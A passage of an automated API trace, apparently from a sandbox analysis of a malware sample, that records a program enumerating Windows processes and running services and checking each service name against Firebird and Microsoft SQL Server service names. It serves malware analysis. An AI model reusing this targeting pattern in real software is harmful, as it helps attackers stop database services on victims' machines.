Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0209.840] lstrlenW (lpString="sppsvc.exe") returned 10 [0209.840] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.841] lstrlenW (lpString="svchost.exe") returned 11 [0209.841] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0209.841] lstrlenW (lpString="Pg.exe") returned 6 [0209.841] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0209.915] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0209.916] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0209.917] lstrlenW (lpString="conhost.exe") returned 11 [0209.917] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0209.917] lstrlenW (lpString="cmd.exe") returned 7 [0209.917] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0209.918] lstrlenW (lpString="conhost.exe") returned 11 [0209.919] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0209.919] lstrlenW (lpString="mode.com") returned 8 [0209.919] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0209.920] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0209.920] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 0 [0209.921] CloseHandle (hObject=0x424) returned 1 [0209.921] Sleep (dwMilliseconds=0x1f4) [0210.450] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236bc38 [0210.450] EnumServicesStatusExW (in: hSCManager=0x236bc38, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0210.451] GetLastError () returned 0xea [0210.451] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x40f9e88 [0210.451] EnumServicesStatusExW (in: hSCManager=0x236bc38, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x40f9e88, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x40f9e88, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0210.451] CloseServiceHandle (hSCObject=0x236bc38) returned 1 [0210.452] lstrlenW (lpString="Appinfo") returned 7 [0210.452] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0210.452] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0210.452] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0210.452] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0210.452] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0210.452] lstrlenW (lpString="AppXSvc") returned 7 [0210.452] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0210.452] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0210.452] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0210.452] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0210.452] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0210.452] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0210.452] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0210.452] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0210.452] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0210.452] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0210.452] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0210.452] lstrlenW (lpString="Audiosrv") returned 8 [0210.452] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0210.452] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0210.452] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0210.452] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0210.452] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0210.452] lstrlenW (lpString="BFE") returned 3 [0210.452] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0210.452] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0210.452] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0210.452] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0210.452] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0210.452] lstrlenW (lpString="BITS") returned 4 [0210.452] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0210.453] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0210.453] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0210.453] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0210.453] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0210.453] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0210.453] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0210.453] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0210.453] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0210.453] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0210.453] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0210.453] lstrlenW (lpString="CDPSvc") returned 6 [0210.453] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0210.453] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0210.453] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0210.453] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0210.453] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0210.453] lstrlenW (lpString="ClickToRunSvc") returned 13 [0210.453] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0210.453] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0210.453] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0210.453] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0210.453] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0210.453] lstrlenW (lpString="ClipSVC") returned 7 [0210.453] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0210.453] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0210.453] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0210.453] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0210.453] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0210.453] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0210.453] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0210.453] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0210.453] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0210.453] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0210.453] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0210.453] lstrlenW (lpString="CryptSvc") returned 8 [0210.453] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0210.454] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0210.454] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0210.454] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0210.454] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0210.454] lstrlenW (lpString="DcomLaunch") returned 10 [0210.454] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0210.454] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0210.454] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0210.454] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0210.454] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0210.454] lstrlenW (lpString="DeviceAssociationService") returned 24 [0210.454] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0210.454] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0210.454] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0210.454] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0210.454] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0210.454] lstrlenW (lpString="Dhcp") returned 4 [0210.454] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0210.454] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0210.454] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0210.454] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0210.454] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0210.454] lstrlenW (lpString="Dnscache") returned 8 [0210.454] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0210.454] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0210.454] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0210.454] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0210.454] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0210.454] lstrlenW (lpString="DoSvc") returned 5 [0210.454] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0210.454] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0210.454] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0210.454] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0210.454] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0210.454] lstrlenW (lpString="DPS") returned 3 [0210.454] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0210.455] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0210.455] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0210.455] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0210.455] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0210.455] lstrlenW (lpString="DusmSvc") returned 7 [0210.455] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0210.455] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0210.455] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0210.455] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0210.455] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0210.455] lstrlenW (lpString="EventLog") returned 8 [0210.455] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0210.455] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0210.455] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0210.455] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0210.455] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0210.455] lstrlenW (lpString="EventSystem") returned 11 [0210.455] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0210.455] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0210.455] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0210.455] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0210.455] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0210.455] lstrlenW (lpString="FontCache") returned 9 [0210.455] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0210.455] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0210.455] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0210.455] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0210.455] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0210.455] lstrlenW (lpString="gpsvc") returned 5 [0210.455] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0210.455] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0210.455] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0210.455] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0210.455] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0210.456] lstrlenW (lpString="iphlpsvc") returned 8 [0210.456] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0210.456] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0210.456] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0210.456] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0210.456] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0210.456] lstrlenW (lpString="KeyIso") returned 6 [0210.456] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0210.456] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0210.456] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0210.456] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0210.456] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0210.456] lstrlenW (lpString="LanmanServer") returned 12 [0210.456] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0210.456] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0210.456] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0210.456] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0210.456] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0210.456] lstrlenW (lpString="LanmanWorkstation") returned 17 [0210.456] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0210.456] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0210.456] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0210.456] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0210.456] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0210.456] lstrlenW (lpString="lfsvc") returned 5 [0210.456] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0210.456] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0210.456] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0210.456] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0210.456] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0210.456] lstrlenW (lpString="LicenseManager") returned 14 [0210.456] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0210.456] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0210.456] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0210.456] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0210.457] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0210.457] lstrlenW (lpString="lmhosts") returned 7 [0210.457] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0210.457] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0210.457] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0210.457] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0210.457] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0210.457] lstrlenW (lpString="LSM") returned 3 [0210.457] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0210.457] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0210.457] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0210.457] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0210.457] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0210.457] lstrlenW (lpString="MpsSvc") returned 6 [0210.457] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0210.457] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0210.457] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0210.457] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0210.457] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0210.457] lstrlenW (lpString="NcbService") returned 10 [0210.457] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0210.457] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0210.457] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0210.457] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0210.457] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0210.457] lstrlenW (lpString="netprofm") returned 8 [0210.457] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0210.457] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0210.457] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0210.457] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0210.457] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0210.457] lstrlenW (lpString="NlaSvc") returned 6 [0210.457] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0210.457] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0210.457] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0210.457] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0210.458] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0210.458] lstrlenW (lpString="nsi") returned 3 [0210.458] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0210.458] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0210.458] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0210.458] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0210.458] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0210.458] lstrlenW (lpString="PcaSvc") returned 6 [0210.458] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0210.458] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0210.458] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0210.458] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0210.458] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0210.458] lstrlenW (lpString="PlugPlay") returned 8 [0210.458] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0210.458] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0210.458] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0210.458] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0210.458] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0210.458] lstrlenW (lpString="Power") returned 5 [0210.458] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0210.458] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0210.458] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0210.458] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0210.458] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0210.458] lstrlenW (lpString="ProfSvc") returned 7 [0210.458] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0210.458] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0210.458] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0210.458] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0210.458] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0210.458] lstrlenW (lpString="RpcEptMapper") returned 12 [0210.458] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0210.458] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0210.458] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0210.459] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0210.459] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0210.459] lstrlenW (lpString="RpcSs") returned 5 [0210.459] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0210.459] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0210.459] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0210.459] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0210.459] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0210.459] lstrlenW (lpString="SamSs") returned 5 [0210.459] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0210.459] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0210.459] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0210.459] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0210.459] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0210.459] lstrlenW (lpString="Schedule") returned 8 [0210.459] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0210.459] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0210.459] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0210.459] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0210.459] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0210.460] lstrlenW (lpString="SecurityHealthService") returned 21 [0210.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0210.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0210.460] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0210.460] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0210.460] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0210.460] lstrlenW (lpString="SENS") returned 4 [0210.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0210.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0210.460] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0210.460] lstrcmpiW (lpString1="mssqlserver", 